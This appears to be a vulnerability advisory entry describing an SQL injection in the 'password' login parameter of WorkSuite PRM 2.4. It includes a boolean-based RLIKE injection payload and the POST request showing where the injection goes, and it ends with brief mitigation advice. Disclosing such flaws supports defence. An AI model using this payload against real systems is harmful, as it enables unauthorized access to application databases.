vendor:
WorkSuite PRM
by:
Mehmet EMİROĞLU
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: WorkSuite PRM
Affected Version From: v2.4
Affected Version To: v2.4
Patch Exists: NO
Related CWE: N/A
CPE: a:codecanyon:worksuite_project_management_system
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: Wamp64, Windows
2019
WorkSuite PRM 2.4 – ‘password’ SQL Inj.
Worksuite is a project management software written in Laravel 5.4 (PHP Framework) which is specifically developed for freelancers and SMEs (Small/Medium sized enterprises). An attacker can exploit a SQL injection vulnerability in the 'password' parameter of the login page to execute arbitrary SQL commands. The attack pattern used is '%27 RLIKE (case when 5021001=5021001 then 0x454d49524f474c55 else 0x28 end) and '7917'='7917' and the POST method used is http://localhost/worksuite24/public/login^_token=1knO8SR8Erjg56Mza4VaEv1Mb9lj5HiJBPmbTnFx&password=3115065[SQLINJECT HERE]
Mitigation:
Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.